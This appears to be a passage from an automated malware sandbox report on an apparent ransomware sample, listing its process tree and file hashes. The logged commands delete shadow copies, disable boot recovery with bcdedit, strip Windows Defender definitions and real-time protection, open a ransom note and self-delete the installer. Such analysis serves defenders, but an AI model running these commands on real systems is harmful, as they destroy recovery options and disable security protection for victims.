C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1072 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1524 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1588 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1704
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1616 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2080 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2152
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2172 -
C:\Windows\system32\notepad.exenotepad.exe C:\rFSH_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2512 -
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\installer.exe"2⤵PID:2520
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2544
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD58f68b6820eee08212f7c3d286720a73d
SHA1244247fa3c39d764b091cfd1bbabafc1286e6c85
SHA2566cf01622d3007b796c4695d740919203e0cb5c03eb400290aabee7480cebb278
SHA512fd01b034c1335d705a5162908f2f1cf29494b9784d342a649cc578db7cfdcc2ad7c47869d08d6ce012db67bb30b4c4203952055cac204a8eeb5b157666cf0a8c
-
MD5
9feb836dd50f68cbf9e87dad21a2fbc4
SHA1f995609d7ea8a22383c8f28e2ac9b657fa767019
SHA256773b3349fdbb3a90decde363815564f1eb0be1549650ec3cfd3f785f27e3d88e
SHA512123db92c2616a2f913c91c6811cf8a375b69b3d71d40ab2633ca298cfda0aa863a3a3f106096f01cbfa01b7f0e56693babf04b1f7f0d7e90b405c9cf54147748